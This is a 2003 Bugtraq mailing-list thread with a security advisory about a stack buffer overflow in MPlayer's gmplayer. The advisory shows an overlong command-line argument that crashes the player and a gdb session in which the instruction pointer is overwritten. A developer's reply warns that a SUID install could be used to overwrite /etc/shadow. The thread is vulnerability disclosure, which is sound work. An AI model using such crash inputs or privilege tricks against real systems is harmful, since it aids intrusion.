10626797 2003-08-31 20:37 +0000 /115 rader/ CoKi <coki@interlap.com.ar> Importerad: 2003-09-02 19:51 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <28765> Ärende: Stack Buffer Overflow in MPlayer ------------------------------------------------------------ From: CoKi <coki@interlap.com.ar> To: bugtraq@securityfocus.com Message-ID: <20030831203745.25261.qmail@sf-www2-symnsj.securityfocus.com> ------------------------------------------------- No System Group - Advisory #2 - 01/09/03 ------------------------------------------------- Program: MPlayer - The Movie Player for Linux Homepage: http://www.mplayerhq.hu Vulnerable Versions: Mplayer v0.91 and prior Risk: Low / Medium Impact: Stack Buffer Overflow ------------------------------------------------- - DESCRIPTION ------------------------------------------------- MPlayer is a movie player for LINUX (runs on many other Unices, and non-x86 CPUs, see the documentation). It plays most MPEG, VOB, AVI, OGG/OGM, VIVO, ASF/WMA/WMV, QT/MOV/MP4, FLI, RM, NuppelVideo, YUV4MPEG, FILM, RoQ, PVA files, supported by many native, XAnim, and Win32 DLL codecs. More informations at: http://www.mplayerhq.hu - DETAILS ------------------------------------------------- bash-2.05b$ gmplayer `perl -e 'print "A" x 550'` Using GNU internationalization Original domain: messages Original dirname: /usr/share/locale Current domain: mplayer Current dirname: /usr/local/share/locale Playing '/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA' File not found: '/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA' MPlayer interrupted by signal 11 in module: unknown - MPlayer crashed by bad usage of CPU/FPU/RAM. Recompile MPlayer with --enable-debug and make a 'gdb' backtrace and disassembly. For details, see DOCS/bugreports.html#crash.b. - MPlayer crashed. This shouldn't happen. It can be a bug in the MPlayer code _or_ in your drivers _or_ in your gcc version. If you think it's MPlayer's fault, please read DOCS/bugreports.html and follow the instructions there. We can't and won't help unless you provide this information when reporting a possible bug. Now we proceed to open gdb to view what may have occured. $gdb gmplayer GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-slackware-linux"... (no debugging symbols found)... (gdb) r `perl -e 'print "A" x 550'` Starting program: /usr/local/bin/gmplayer ` perl -e 'print "A" x 550'` (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...[New Thread 16384 (LWP 2044)] Using GNU internationalization Original domain: messages Original dirname: /usr/share/locale Current domain: mplayer Current dirname: /usr/local/share/locale MPlayer 0.90rc5-3.2.2 (C) 2000-2003 Arpad Gereoffy (see DOCS) Playing '/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA' File not found: '/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA' Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 16384 (LWP 2044)] 0x41414141 in ?? () (gdb) i r ebp eip esp ebp 0x41414141 0x41414141 eip 0x41414141 0x41414141 esp 0xbfffd0b0 0xbfffd0b0 (gdb) Tested in Slackware Linux 9.0 NOTE: The program 'gmplayer' isn't SUID by default. - SOLUTIONS ------------------------------------------------- Update the program to latest version - REFERENCES ------------------------------------------------- http://www.nosystem.com.ar/advisories/advisory-02.txt - CREDITS ------------------------------------------------- Discovered by CoKi <coki@interlap.com.ar> No System Group - http://www.nosystem.com.ar (10626797) /CoKi <coki@interlap.com.ar>/--(Ombruten) Kommentar i text 10674219 av <gabucino@mplayerhq.hu> 10674219 2003-09-11 10:06 +0200 /24 rader/ <gabucino@mplayerhq.hu> Importerad: 2003-09-11 18:39 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <28965> Kommentar till text 10626797 av CoKi <coki@interlap.com.ar> Ärende: Re: Stack Buffer Overflow in MPlayer ------------------------------------------------------------ From: <gabucino@mplayerhq.hu> To: bugtraq@securityfocus.com Message-ID: <20030911080636.GA900@woodstock.localdomain> CoKi wrote: > ------------------------------------------------- > No System Group - Advisory #2 - 01/09/03 > ------------------------------------------------- > Program: MPlayer - The Movie Player for Linux > Homepage: http://www.mplayerhq.hu > Vulnerable Versions: Mplayer v0.91 and prior > Risk: Low / Medium > Impact: Stack Buffer Overflow > ------------------------------------------------- > > NOTE: The program 'gmplayer' isn't SUID by default. A SUID MPlayer can be easily tricked to - like - overwrite /etc/shadow with a new one, using very simple commandline options. One should *NEVER* set MPlayer SUID root. -- Gabucino MPlayer Core Team (10674219) /<gabucino@mplayerhq.hu>/---------------- Bilaga (application/pgp-signature) i text 10674220 10674220 2003-09-11 10:06 +0200 /9 rader/ <gabucino@mplayerhq.hu> Importerad: 2003-09-11 18:39 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <28966> Bilaga (application/pgp-signature) till text 10674219 Ärende: Bilaga till: Re: Stack Buffer Overflow in MPlayer ------------------------------------------------------------ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE/YC0MAq6GhkS0XDcRAizXAJ9WUn1R7cJKPGWdRxen0uP9cE5DiACbByxk xdR5qYywafDQGyO33qvhYio= =8IZ2 -----END PGP SIGNATURE----- (10674220) /<gabucino@mplayerhq.hu>/----------------